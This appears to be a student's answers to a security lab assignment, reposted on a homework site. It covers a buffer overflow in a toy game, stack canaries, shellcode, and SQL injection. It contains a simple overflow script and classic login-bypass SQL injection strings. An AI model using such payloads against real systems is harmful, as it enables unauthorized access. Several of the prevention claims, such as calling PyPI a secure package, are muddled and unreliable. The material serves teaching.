Security Vulnerabilities: Buffer Overflows and SQL Injection

Verified

Added on 2020/05/03

AI Summary

This assignment delves into the realm of computer security, specifically focusing on buffer overflow and SQL injection vulnerabilities. The solution begins by demonstrating a buffer overflow exploit using Python, explaining how it can overwrite memory and potentially alter game values. It then discusses preventative measures such as using stackguard and secure coding practices. Furthermore, the assignment explores the broader implications of buffer overflows, including their potential use in gaining system access and the impact on various critical infrastructures. The solution also contrasts the vulnerability of C-based programs with the relative safety of Java. The assignment then transitions to SQL injection, showcasing how this technique can be used to bypass authentication and access sensitive data. It provides examples of SQL injection attacks, discusses the limitations of certain prevention methods, and offers solutions for mitigating these risks, emphasizing the importance of input sanitization and secure coding practices. The assignment concludes by highlighting the commonality of SQL injection attacks and the need for continuous security improvements.

1. LOW LEVEL EXPLOITS
1. Set the characters gold or health to a number greater than 9000 by utilizing a buffer
overflow. How did you achieve this? Explain using reference to bytes and ASCII as to what
the exact value was that you achieved. [4 marks]
By using python to create an executable exploit file called “overf” which contains the following:
#! usrbin/python
print “G” * 1000
The above executable script will print a thousand “G” characters, then I created another file called
“e1” to be written by piping output from “overf” to “e1” using the following command
./overf > e1 so on doing a line feed command ls -l el the total number of characters are 1001 which
consist of 1000 “G” characters plus one line.
So to create a buffer overflow in the a.out, output from the python exploit file is pipe to the input
field for the name by executing the following command:
./b1 | ./a.out this will output a segmentation fault message from the terminal. Gold value will be
Gold: 1094795585 while Hp will be Hp: 30
2. How could this exploit be prevented? [2 marks]
Developers should avoid standard library functions that are not bounds checked such as gets, scanf,
strcpy file_open.
Use of stackguard compile extensions which detects and thwart buffer flows. By using fstact-
protecter this will head off stack overflow attacks quickly. Developers also need to consider secure
development practices which include thorough testing to detect and fix buffer overflows.
3. Could this exploit be useful for more than just the game? Could it be used to gain access to
a system? If not, why not? If so, where might it be used? [4 marks]
Yes, buffer overflow is harmful to any vulnerable application whether for a small business or an
enterprise business. Large system such as those which control the power grid can be attack by this
vulnerability which may cause hazardous damage to the public or environment. If the running
vulnerable system has privileges such as read, write and modify an attacker can gain to root shell
through shellcode there a malicious attacker can perform various malicious task such as deleting
files, accessing unclassified information etc. Buffer overflow can be used to attack power grid
stations, car manufacturing companies, hospital and nuclear power stations.
2. GENERAL QUESTIONS
1.1 Why is it necessary for us to provide the flag -fno-stack-protector to GCC? What is a
canary in terms of a buffer overflow and how can a canary prevent a buffer overflow exploit?
[4 marks]
When a program is compiled with fno-stack-protector, it disabled modern protections against stack
overflow by allowing stack to be overwritten while in the functions. It expose the stack layout to a
smash.
A canary is a defense mechanism use to protect stack against buffer overflow. It store a
dynamically calculated value when the function begin to execute on the stack before returning the
address. When the function is ready to return the address the stack canary will be popped off the
stack recomputed and compared to stored stack canary. The return address is checked against the
stored stack value. If both the return stack canary and stored stack value are not the same then it has
been tampered therefore application will exit with an error code of smashed.

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

2. If the game above was written in Java instead of C, would the savegame still be exploitable?
[2 marks]
No. This is because Java strings are based on char arrays and Java automatically check arrays
bounds on memory access.
3. Imagine you were exploiting a program that was running with escalated privileges (i.e.
could read sensitive files, modify other users settings and so on) is it possible to obtain a BASH
shell using buffer overflows? Be sure to explain what shellcode is and how the shellcode is
executed 1.
[5 marks]
Yes, it is possible to obtain a Bash shell using buffer overflow. A shellcode is an assembly language
program with a set of target machine instruction which executes a shell or execute a payload or
generate payload. The Shellcode can be executed in the following step: 1. by finding a vulnerable
application with buffer overflow vulnerability. 2. A generated shellcode is compile with a program
or attach to a payload which will be executed in the target. 3. When a program which carries a
shellcode is execute in the machine’s target a spawn shell is obtain.
2. SQL EXPLOITS
1. Show how it is possible to log in as any user by performing an SQL injection attack on the
username/password login page. [2 marks]
By using the following input as username and password, any user can login into the system.
Username: ' OR '1'='1' /*
Password: ' OR '1'='1' /*
Username: ' OR '1'='1' --
Password: ' OR '1'='1' –
2. The website has been clued in on their major security problem and pre-vented the previous
attack. Is it possible to use the status query to work out the password of one of the
administrators Bobby 2? [4 marks]
No, because only one statement can be executed at a time. Example is the error which generate on
injecting sql to retrieve password cur.execute("SELECT status FROM Users WHERE username
= '%s'" % username) sqlite3.Warning: You can only execute one statement at a time.
3. How can these attacks be prevented? Is it a difficult security problem to fix? Why is it so
common? [4 marks]
SQL injection can be prevented by sanitizing input data from the form or terminal. Also thorough
testing of a system should be done before deploying to production environment. Another way of
preventing SQL injection is by using secure packages such as PyPi for python.
It is not difficult to fix, only developers are not doing much of system testing and further research of
imported packages which application are currently used. SQL injection are common because most
of the people don’t follow standard way of software development process. Also most of the
packages which application are depending on do not get updated after application has been
deployed.

Reference
One, A. (1996). Smashing The Stack For Fun And Profit. [online] Available at:
http://cecs.wright.edu/people/faculty/tkprasad/courses/cs781/alephOne.html [Accessed 24 Oct.
2017].
Leon, E. and Bruda, S. (2016). Counter-Measures against Stack Buffer Overflows in GNU/Linux
Operating Systems. Procedia Computer Science, 83, pp.1301-1306.
Black, P. and Bojanova, I. (2016). Defeating Buffer Overflow: A Trivial but Dangerous Bug. IT
Professional, 18(6), pp.58-61.
Yang, Z. (2015). SQL Injection-Database Attack Revolution and Prevention. Applied Mechanics
and Materials, 740, pp.810-814.

1 out of 3

Security Vulnerabilities: Buffer Overflows and SQL Injection

Secure Best Marks with AI Grader

Related Documents

Understanding Buffer Overflow and JOP Exploitation

+13062052269

info@desklib.com